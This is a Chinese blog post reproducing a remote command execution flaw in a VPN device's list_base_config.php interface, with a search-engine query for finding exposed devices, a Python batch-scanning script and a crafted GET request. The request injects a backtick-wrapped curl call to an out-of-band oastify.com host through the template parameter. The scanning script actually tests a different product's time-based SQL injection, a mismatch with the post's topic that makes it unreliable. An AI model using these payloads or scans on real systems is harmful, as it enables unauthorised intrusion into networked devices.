首页 > 其他分享 >【漏洞复现】某某康达vpn list_base_config 远程命令执行漏洞

【漏洞复现】某某康达vpn list_base_config 远程命令执行漏洞

时间:2024-08-17 09:58:51浏览次数:13  
标签:HTTP url 数据包 list 漏洞 base file config

           声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

网络设备是确保计算机网络顺畅运行的关键硬件组件,主要包括路由器、交换机、网桥、网卡、集线器、防火墙、调制解调器以及无线接入点等。其中,路由器主要负责在不同网络之间进行数据转发和地址转换;交换机则用于局域网内各设备的连接和数据交换;网桥的作用是连接不同网段,实现它们之间的通信;网卡则为计算机提供有线或无线网络接口。防火墙的主要职责是监控和控制网络流量,以维护网络的安全。然而,如果网络设备中的list_base_config.php接口存在命令执行漏洞,攻击者就可能利用这一漏洞获取系统权限。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="/images/raisecom/back.gif"

2.使用poc批量扫描

import requests
import urllib3
from urllib.parse import urljoin, quote
import argparse
import ssl
import re

# 禁用SSL证书验证,忽略警告
ssl._create_default_https_context = ssl._create_unverified_context
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def read_file(file_path):
    """
    读取文件中的URL列表
    :param file_path: 文件路径
    :return: URL列表
    """
    with open(file_path, 'r') as file:
        urls = file.read().splitlines()
    return urls

def check(url):
    """
    检查目标URL是否存在SQL注入漏洞
    :param url: 目标URL
    :return: 如果存在漏洞,返回True
    """
    url = url.rstrip("/")
    target = urljoin(url, "/SystemManager/Api/TicketManager.ashx")
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36",
        "Content-Type": "application/x-www-form-urlencoded"
    }
    # 构造SQL注入数据包
    data = "Method=GetReServeOrder&solutionId=1' WAITFOR DELAY '0:0:5'--"
    try:
        response = requests.post(target, verify=False, headers=headers, timeout=25, data=data)
        # 判断响应状态码、响应内容以及响应时间是否符合预期
        if response.status_code == 200 and 'Table' in response.text and 5 < response.elapsed.total_seconds() < 10:
            print(f"\033[31mDiscovered:{url}: zckxTicketManager_SQLInject!\033[0m")
            return True
    except Exception as e:
        pass

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url", help="URL")
    parser.add_argument("-f", "--txt", help="file")
    args = parser.parse_args()
    url = args.url
    txt = args.txt
    if url:
        check(url)
    elif txt:
        urls = read_file(txt)
        for url in urls:
            check(url)
    else:
        print("help")

cmd运行poc脚本:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

1.构造数据包:

GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close

2.数据包分析 

  1. 这是一个HTTP GET请求的数据包,下面是对该数据包的解析:

  2. 请求行:GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60 HTTP/1.1

    • GET: 表示这是一个HTTP GET请求。
    • /vpn/list_base_config.php: 请求的资源路径。
    • ?type=mod&parts=base_config&template=%60curl%201111.7rzhzevp0iszj2p5s5186r25jwpndf14.oastify.com%60: 查询参数,包括typepartstemplate等。
    • HTTP/1.1: HTTP协议版本。
  3. 请求头:

    • Host: x.x.x.x: 目标服务器的主机名或IP地址。
    • User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: 客户端浏览器的信息。
    • Connection: close: 表示请求完成后关闭连接。
  4. 这个数据包是一个HTTP请求,用于获取位于http://x.x.x.x/vpn/list_base_config.php的资源,并传递了一些查询参数。

3.结束跑路

1.使用DNSLog.cn获取一个Domain

2.构造数据包,执行curl命令访问DNSLog生产的domain

3.DNSLog获取服务器的IP地址

每篇一言:纵使天光终将熄灭,我们也要歌颂太阳。

标签:HTTP,url,数据包,list,漏洞,base,file,config
From: https://blog.csdn.net/weixin_54799594/article/details/141256530

相关文章

  • 【漏洞复现】某骋BPM Handler SQL注入漏洞
               声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。一、漏洞描述某骋BPM系统是一款全面的商业流程管理平台,旨在帮助企业自动化和优化业务流程。它集成了工作流引擎、表单......
  • HBase学习的第四天--HBase的进阶与API
    HBase进阶与API一、Hbaseshell1、Region信息观察创建表指定命名空间在创建表的时候可以选择创建到bigdata17这个namespace中,如何实现呢?使用这种格式即可:‘命名空间名称:表名’针对default这个命名空间,在使用的时候可以省略不写create'hbase01:t1','info'此时使用li......
  • C# Tcp Server端实现,使用TcpListener
    usingSystem;usingSystem.Collections.Generic;usingSystem.Linq;usingSystem.Text;usingSystem.Threading;usingSystem.Net.Sockets;usingSystem.Net;usingF.Studio.Common.Cfg;usingSystem.Collections.Concurrent;namespaceKomaxCSTcpServer{pub......
  • 萌新赛 sprintf漏洞
    首先是个.git源码源码泄露,用githack回复一下源码源码<?php$pass=sprintf("andpass='%s'",addslashes($_GET['pass']));$sql=sprintf("select*fromuserwherename='%s'$pass",addslashes($_GET['name']));?>......
  • conda虚拟环境、base环境迁移
    前提:两台电脑都有conda环境一、安装所需依赖包。condainstall-cconda-forgeconda-pack二、环境打包如果迁移的是虚拟环境,则可以直接打包,例如打包名为env_name的虚拟环境condapack-nenv_name如果迁移的是base环境,则需要先克隆,例如将克隆出的虚拟环境取名为env_namec......
  • 13 Listbox 组件
    13Listbox组件Tkinter的Listbox组件是一个用于显示列表项的控件,用户可以从中选择一个或多个项目。以下是对Listbox组件的详细说明和一个使用案例。Listbox组件属性基本属性width:控件的宽度,通常以字符数为单位。height:控件的高度,以行数为单位。选择模式sel......
  • Redis数据结构ZipList详解、ZipList的连锁更新问题
    ZipListZipList是一种特殊的“双端链表”,由一系列特殊编码的连续内存块组成。可以在任意一端进行压入/弹出操作,并且该操作的时间复杂度为O(1)。属性类型长度用途zlbytesuint32_t4字节记录整个压缩列表占用的内存字节数zltailuint32_t4字节记录压缩列表表尾节点距离压......
  • 【公式推导】Elucidating the Design Space of Diffusion-Based Generative Models 【
    ElucidatingtheDesignSpaceofDiffusion-BasedGenerativeModels论文精读关注B站可以观看更多实战教学视频:hallo128的个人空间【更新中】EDM论文精读论文链接(1)论文:ElucidatingtheDesignSpaceofDiffusion-BasedGenerativeModels(2)引用:KarrasT,Aittala......
  • 前后端不分离"老"项目,XSS 漏洞处理实践
    前言本月迭代需求没有几个,领导给我派了一个漏洞修复的活。这个项目是一个前后端不分离的ToB老项目,前端使用Velocity模板+JQuery+miniui,后端是用的Spring。嗯,前后端不分离,技术老旧,模块众多且耦合,基础设施不完善,让我从一开始校招(2022)刚进来接触到这个项目时候,就感到“畏惧、难受......
  • wookteam协作平台api/users/searchinfo接口存在SQL注入漏洞 附POC
    @[toc]免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。1.wookteam协作平台简介微信公众号搜索:南风漏洞复现文......